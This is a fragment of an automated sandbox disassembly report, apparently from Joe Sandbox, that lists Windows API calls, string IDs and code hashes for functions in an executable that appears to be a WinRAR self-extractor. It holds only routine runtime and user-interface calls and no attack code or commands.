                  • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                  • String ID: CMT
                  • API String ID: 1706572503-2756464174
                  • Opcode ID: 326c5728111df8b2561a24e315796ff16884c2f9c29b9ea198159b1a9c75a7d1
                  • Instruction ID: abb246a20d8eff23a99af6413f81d1403b41bb17d286e83db99d1e47d13cd729
                  • Opcode Fuzzy Hash: 326c5728111df8b2561a24e315796ff16884c2f9c29b9ea198159b1a9c75a7d1
                  • Instruction Fuzzy Hash: 2362F6729002448FDF19DF34C8857EA3BE1EF54324F08457EED9A9B282DB74A945EB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00F58767
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F58771
                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00F5877E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: 33afcee1f80412c4f809a83e42bddea0efc21cca5307254385b70c701ea48ceb
                  • Instruction ID: d343e6a623d897884dcf04d6c1c5915d67806f5f9060af816f79b8f63cfaefb9
                  • Opcode Fuzzy Hash: 33afcee1f80412c4f809a83e42bddea0efc21cca5307254385b70c701ea48ceb
                  • Instruction Fuzzy Hash: 8931C275D0122D9BCB21DF68DC88B9CBBB8AF09310F5041EAE91CA7250EB749B859F45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID: .
                  • API String ID: 0-248832578
                  • Opcode ID: e1523e59ab420ffd64c9513577b92bc013f5d8a39630f6ee7c024123893d968c
                  • Instruction ID: 61c6aab2b9fba32d17b2d4ac263e6f14ef003089e1c6dd09beb90b0d6654069a
                  • Opcode Fuzzy Hash: e1523e59ab420ffd64c9513577b92bc013f5d8a39630f6ee7c024123893d968c
                  • Instruction Fuzzy Hash: 81310771900109AFDB249E78CC84EFB7BBDDB85325F040298FA18D7251E6349D59DB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                  • Instruction ID: 92b2afc1d013d47bfbf862ccf9a59ed811c564f08808eba7daaf58755a3746c5
                  • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                  • Instruction Fuzzy Hash: 3D022D72E002199FDF14CFA9C8806ADBBF1FF88325F254169D91AE7384D731A945DB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F4A662
                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,00F6E600,?,?), ref: 00F4A6B1
                  Similarity
                  • API ID: FormatInfoLocaleNumber
                  • String ID:
                  • API String ID: 2169056816-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLastError.KERNEL32(00F4117C,?,00000200), ref: 00F36EC9
                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00F36EEA
                  Similarity
                  • API ID: ErrorFormatLastMessage
                  • String ID:
                  • API String ID: 3479602957-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F6118F,?,?,00000008,?,?,00F60E2F,00000000), ref: 00F613C1
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Similarity
                  • API ID:
                  • String ID: gj
                  • API String ID: 0-4203073231
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 00F3AD1A
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00F4EAC5), ref: 00F4F068
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Similarity
                  • API ID: HeapProcess
                  • String ID:
                  • API String ID: 54951025-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                  • Instruction ID: a9debd9344c6ae17ccb3aa83142273fb71bb3cb23929b37acfe4235cf13514eb
                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                  • Instruction Fuzzy Hash: A1C1A3366051530ADF2D863A953413FBEA15AA27B331A076DDDB3CB1C5FE20D52CEA24
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd

                  APIs
                  • _swprintf.LIBCMT ref: 00F3DABE
                    • Part of subcall function 00F3400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F3401D
                    • Part of subcall function 00F41596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00F70EE8,00000200,00F3D202,00000000,?,00000050,00F70EE8), ref: 00F415B3
                  • _strlen.LIBCMT ref: 00F3DADF
                  • SetDlgItemTextW.USER32(?,00F6E154,?), ref: 00F3DB3F
                  • GetWindowRect.USER32(?,?), ref: 00F3DB79
                  • GetClientRect.USER32(?,?), ref: 00F3DB85
                  • GetWindowLongW.USER32(?,000000F0), ref: 00F3DC25
                  • GetWindowRect.USER32(?,?), ref: 00F3DC52
                  • SetWindowTextW.USER32(?,?), ref: 00F3DC95
                  • GetSystemMetrics.USER32(00000008), ref: 00F3DC9D
                  • GetWindow.USER32(?,00000005), ref: 00F3DCA8
                  • GetWindowRect.USER32(00000000,?), ref: 00F3DCD5
                  • GetWindow.USER32(00000000,00000002), ref: 00F3DD47
                  Similarity
                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                  • String ID: $%s:$CAPTION$d
                  • API String ID: 2407758923-2512411981

                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 00F5C277
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE2F
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE41
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE53
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE65
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE77
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE89
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BE9B
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BEAD
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BEBF
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BED1
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BEE3
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BEF5
                    • Part of subcall function 00F5BE12: _free.LIBCMT ref: 00F5BF07
                  • _free.LIBCMT ref: 00F5C26C
                    • Part of subcall function 00F584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958), ref: 00F584F4
                    • Part of subcall function 00F584DE: GetLastError.KERNEL32(00F63958,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958,00F63958), ref: 00F58506
                  • _free.LIBCMT ref: 00F5C28E
                  • _free.LIBCMT ref: 00F5C2A3
                  • _free.LIBCMT ref: 00F5C2AE
                  • _free.LIBCMT ref: 00F5C2D0
                  • _free.LIBCMT ref: 00F5C2E3
                  • _free.LIBCMT ref: 00F5C2F1
                  • _free.LIBCMT ref: 00F5C2FC
                  • _free.LIBCMT ref: 00F5C334
                  • _free.LIBCMT ref: 00F5C33B
                  • _free.LIBCMT ref: 00F5C358
                  • _free.LIBCMT ref: 00F5C370
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0

                  APIs
                  • GetWindow.USER32(?,00000005), ref: 00F4CD51
                  • GetClassNameW.USER32(00000000,?,00000800), ref: 00F4CD7D
                    • Part of subcall function 00F417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F3BB05,00000000,.exe,?,?,00000800,?,?,00F485DF,?), ref: 00F417C2
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00F4CD99
                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00F4CDB0
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00F4CDC4
                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00F4CDED
                  • DeleteObject.GDI32(00000000), ref: 00F4CDF4
                  • GetWindow.USER32(00000000,00000002), ref: 00F4CDFD
                  Similarity
                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                  • String ID: STATIC
                  • API String ID: 3820355801-1882779555

                  APIs
                  • _free.LIBCMT ref: 00F58EC5
                    • Part of subcall function 00F584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958), ref: 00F584F4
                    • Part of subcall function 00F584DE: GetLastError.KERNEL32(00F63958,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958,00F63958), ref: 00F58506
                  • _free.LIBCMT ref: 00F58ED1
                  • _free.LIBCMT ref: 00F58EDC
                  • _free.LIBCMT ref: 00F58EE7
                  • _free.LIBCMT ref: 00F58EF2
                  • _free.LIBCMT ref: 00F58EFD
                  • _free.LIBCMT ref: 00F58F08
                  • _free.LIBCMT ref: 00F58F13
                  • _free.LIBCMT ref: 00F58F1E
                  • _free.LIBCMT ref: 00F58F2C
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0

                  Similarity
                  • API ID:
                  • String ID: ;%u$x%u$xc%u
                  • API String ID: 0-2277559157

                  APIs
                    • Part of subcall function 00F3130B: GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                    • Part of subcall function 00F3130B: SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  • EndDialog.USER32(?,00000001), ref: 00F4AD20
                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F4AD47
                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00F4AD60
                  • SetWindowTextW.USER32(?,?), ref: 00F4AD71
                  • GetDlgItem.USER32(?,00000065), ref: 00F4AD7A
                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00F4AD8E
                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00F4ADA4
                  Similarity
                  • API ID: MessageSend$Item$TextWindow$Dialog
                  • String ID: LICENSEDLG
                  • API String ID: 3214253823-2177901306

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F39448
                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00F3946B
                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00F3948A
                    • Part of subcall function 00F417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F3BB05,00000000,.exe,?,?,00000800,?,?,00F485DF,?), ref: 00F417C2
                  • _swprintf.LIBCMT ref: 00F39526
                    • Part of subcall function 00F3400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F3401D
                  • MoveFileW.KERNEL32(?,?), ref: 00F39595
                  • MoveFileW.KERNEL32(?,?), ref: 00F395D5
                  Strings
                  Similarity
                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                  • String ID: rtmp%d
                  • API String ID: 2111052971-3303766350
                  • Opcode ID: a4a2c068ba329752f7a485ca3af8986400a06d4562f04e2efc1c67de01cbd44a
                  • Instruction ID: d130cd6d5a6e443f5c1337c95a067e75c0d926e141fd6fc8aee253df43d137b1
                  • Opcode Fuzzy Hash: a4a2c068ba329752f7a485ca3af8986400a06d4562f04e2efc1c67de01cbd44a
                  • Instruction Fuzzy Hash: 7B415171D0525976DF30EB608C85ADA777CAF513A0F0444E5B549E3142EBF89B88EB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __aulldiv.LIBCMT ref: 00F40A9D
                    • Part of subcall function 00F3ACF5: GetVersionExW.KERNEL32(?), ref: 00F3AD1A
                  • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00F40AC0
                  • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00F40AD2
                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00F40AE3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F40AF3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F40B03
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F40B3D
                  • __aullrem.LIBCMT ref: 00F40BCB
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                  • String ID:
                  • API String ID: 1247370737-0
                  • Opcode ID: 080acbb9344fd2e4e6e07636b988c9724dd0384c4451d280361862d2c5d0684b
                  • Instruction ID: 8040d42fa62d20d0b15745851c4255a32fee7564ee68e75b113cc4aab28b4765
                  • Opcode Fuzzy Hash: 080acbb9344fd2e4e6e07636b988c9724dd0384c4451d280361862d2c5d0684b
                  • Instruction Fuzzy Hash: 91411AB1408305AFC710DF65C88496BFBF8FB88714F004A2EFA96D2650E779E549DB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00F5F5A2,?,00000000,?,00000000,00000000), ref: 00F5EE6F
                  • __fassign.LIBCMT ref: 00F5EEEA
                  • __fassign.LIBCMT ref: 00F5EF05
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00F5EF2B
                  • WriteFile.KERNEL32(?,?,00000000,00F5F5A2,00000000,?,?,?,?,?,?,?,?,?,00F5F5A2,?), ref: 00F5EF4A
                  • WriteFile.KERNEL32(?,?,00000001,00F5F5A2,00000000,?,?,?,?,?,?,?,?,?,00F5F5A2,?), ref: 00F5EF83
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: e645b86b36f42386956cca003810c8d5c1de303e5646a1710d01d1ad189c2fe2
                  • Instruction ID: d8ff914fad7c9414fdabe403ddea77382931ce070c2faf7d4062d06d6053002d
                  • Opcode Fuzzy Hash: e645b86b36f42386956cca003810c8d5c1de303e5646a1710d01d1ad189c2fe2
                  • Instruction Fuzzy Hash: C95108B1E00209AFCB14CFA8DC45AEEBBF9FF09311F14411AEA55E7291DB709A45DB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetTempPathW.KERNEL32(00000800,?), ref: 00F4C54A
                  • _swprintf.LIBCMT ref: 00F4C57E
                    • Part of subcall function 00F3400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F3401D
                  • SetDlgItemTextW.USER32(?,00000066,00F7946A), ref: 00F4C59E
                  • _wcschr.LIBVCRUNTIME ref: 00F4C5D1
                  • EndDialog.USER32(?,00000001), ref: 00F4C6B2
                  Strings
                  Similarity
                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                  • String ID: %s%s%u
                  • API String ID: 2892007947-1360425832
                  • Opcode ID: edd16b02b7c0e8601117fa08a9b6bd3430c08747579a2b456fc3926c345c14e6
                  • Instruction ID: a4711904a6d9153d0a46ba90fba1e31a6c49e6d3c572109bffa7a144c4caa67f
                  • Opcode Fuzzy Hash: edd16b02b7c0e8601117fa08a9b6bd3430c08747579a2b456fc3926c345c14e6
                  • Instruction Fuzzy Hash: 6141C472D0061CAADB25DFA0CC45EDA7BBDEB08315F0090A6E90DE6060E7759BC4EB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00F48F38
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00F48F59
                  Strings
                  Similarity
                  • API ID: AllocByteCharGlobalMultiWide
                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                  • API String ID: 3286310052-4209811716
                  • Opcode ID: 1e454a3289f27adacecfe05ff355b6e7c014d542b900b1bf860f7abfde6a571d
                  • Instruction ID: 4222b61530bebf26a44cd211ca2e2a595844996e958cb6d4d6d8c4797cfe33ea
                  • Opcode Fuzzy Hash: 1e454a3289f27adacecfe05ff355b6e7c014d542b900b1bf860f7abfde6a571d
                  • Instruction Fuzzy Hash: 41310B319083167BD710BB649C02F6F7B989F417B1F140519FD11971C1EF68994EB3A6
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ShowWindow.USER32(?,00000000), ref: 00F4964E
                  • GetWindowRect.USER32(?,00000000), ref: 00F49693
                  • ShowWindow.USER32(?,00000005,00000000), ref: 00F4972A
                  • SetWindowTextW.USER32(?,00000000), ref: 00F49732
                  • ShowWindow.USER32(00000000,00000005), ref: 00F49748
                  Strings
                  Similarity
                  • API ID: Window$Show$RectText
                  • String ID: RarHtmlClassName
                  • API String ID: 3937224194-1658105358
                  • Opcode ID: a5a9585f0d86d33ca0dbe9d1ccff98c7bb83ef76e576b3d80efa102e5ac13703
                  • Instruction ID: 068839aa808fc628531ba8a3ba040f607b970aa097a4e6343289d070eef12d8e
                  • Opcode Fuzzy Hash: a5a9585f0d86d33ca0dbe9d1ccff98c7bb83ef76e576b3d80efa102e5ac13703
                  • Instruction Fuzzy Hash: EF31E032508204AFDB519F64DC48F2B7FA8EF48321F01455AFE499A162CB74D894EBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F5BF79: _free.LIBCMT ref: 00F5BFA2
                  • _free.LIBCMT ref: 00F5C003
                    • Part of subcall function 00F584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958), ref: 00F584F4
                    • Part of subcall function 00F584DE: GetLastError.KERNEL32(00F63958,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958,00F63958), ref: 00F58506
                  • _free.LIBCMT ref: 00F5C00E
                  • _free.LIBCMT ref: 00F5C019
                  • _free.LIBCMT ref: 00F5C06D
                  • _free.LIBCMT ref: 00F5C078
                  • _free.LIBCMT ref: 00F5C083
                  • _free.LIBCMT ref: 00F5C08E
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction ID: ef4aee2f6458175b6ef317351f09ef7bdd40415fc678cc085a71cd20a4d9f787
                  • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction Fuzzy Hash: A6112E75541B04FAD620BBB0CC06FCBB7DD6F00702F408815BB9A66852DB79F90DAA90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLastError.KERNEL32(?,?,00F520C1,00F4FB12), ref: 00F520D8
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F520E6
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F520FF
                  • SetLastError.KERNEL32(00000000,?,00F520C1,00F4FB12), ref: 00F52151
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: a4a67376037dcc82f63e6e37836b1cc3b2715d91c5f3c70daa382fdd9901b79a
                  • Instruction ID: cb9ee826e8647117de190a27504cb0e9f39c1b2db1e1d1d25312d2a53ba48d0d
                  • Opcode Fuzzy Hash: a4a67376037dcc82f63e6e37836b1cc3b2715d91c5f3c70daa382fdd9901b79a
                  • Instruction Fuzzy Hash: D201283761AB156EE6952BB4BC8551B3A44EB227B77210729FF20950F0FF924C0D7154
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Similarity
                  • API ID:
                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                  • API String ID: 0-1718035505
                  • Opcode ID: 4379b4cbf74f148df318b43e091975b9019b750c92767148e5fd91addba521ec
                  • Instruction ID: 27eebdf952cbcb0e23f4bebf297cd2cdb4e51a919ac46c9ce418b75de16abd8f
                  • Opcode Fuzzy Hash: 4379b4cbf74f148df318b43e091975b9019b750c92767148e5fd91addba521ec
                  • Instruction Fuzzy Hash: D301CD71F416226F4F215F745CD56A63BA89A41776320027FEE01E7340DEA1C849F690
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F40D0D
                    • Part of subcall function 00F3ACF5: GetVersionExW.KERNEL32(?), ref: 00F3AD1A
                  • LocalFileTimeToFileTime.KERNEL32(?,00F40CB8), ref: 00F40D31
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F40D47
                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00F40D56
                  • SystemTimeToFileTime.KERNEL32(?,00F40CB8), ref: 00F40D64
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F40D72
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion
                  • String ID:
                  • API String ID: 2092733347-0
                  • Opcode ID: 9457bb7c77629bfbe4ec0d30b60a534d18e0e51e46b88a39096f6fe0b228547e
                  • Instruction ID: 4c18557adcadce408116116e67fab51e1de5ffc23c99ac0d1086a490cd4c7e14
                  • Opcode Fuzzy Hash: 9457bb7c77629bfbe4ec0d30b60a534d18e0e51e46b88a39096f6fe0b228547e
                  • Instruction Fuzzy Hash: ED31D87A90020DEBCB00DFE5C8859EFBBB8FF58710B04455AE955E3210EB309645DB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: dce8e0079e93f3745af27bfb76a9e9cbb4b6e64a4fb228e905691698ca24b39a
                  • Instruction ID: c741bf1a7b4d8c1e1859650b0a0afc07ae9e9840718c8100801d05eaa4dbb4d5
                  • Opcode Fuzzy Hash: dce8e0079e93f3745af27bfb76a9e9cbb4b6e64a4fb228e905691698ca24b39a
                  • Instruction Fuzzy Hash: 1E216771B0810E7BD7059E14CC42F6B7BAD9B50B54F148525FC0997301F6F4DE4576A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLastError.KERNEL32(?,00F70EE8,00F53E14,00F70EE8,?,?,00F53713,00000050,?,00F70EE8,00000200), ref: 00F58FA9
                  • _free.LIBCMT ref: 00F58FDC
                  • _free.LIBCMT ref: 00F59004
                  • SetLastError.KERNEL32(00000000,?,00F70EE8,00000200), ref: 00F59011
                  • SetLastError.KERNEL32(00000000,?,00F70EE8,00000200), ref: 00F5901D
                  • _abort.LIBCMT ref: 00F59023
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: 84c76f74efef15f3aef34cb3646fcb948473de92b221dd840ee4312a4aaa66cf
                  • Instruction ID: 114926da033cdf4266a4afc09f7c016365926b578fe6a3be49c63302279f1fe9
                  • Opcode Fuzzy Hash: 84c76f74efef15f3aef34cb3646fcb948473de92b221dd840ee4312a4aaa66cf
                  • Instruction Fuzzy Hash: E7F0F936909501BAC61173386C06B2B39555BD57B7F240114FF26F2192EF64C90F7151
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F4D2F2
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F4D30C
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F4D31D
                  • TranslateMessage.USER32(?), ref: 00F4D327
                  • DispatchMessageW.USER32(?), ref: 00F4D331
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F4D33C
                  Similarity
                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
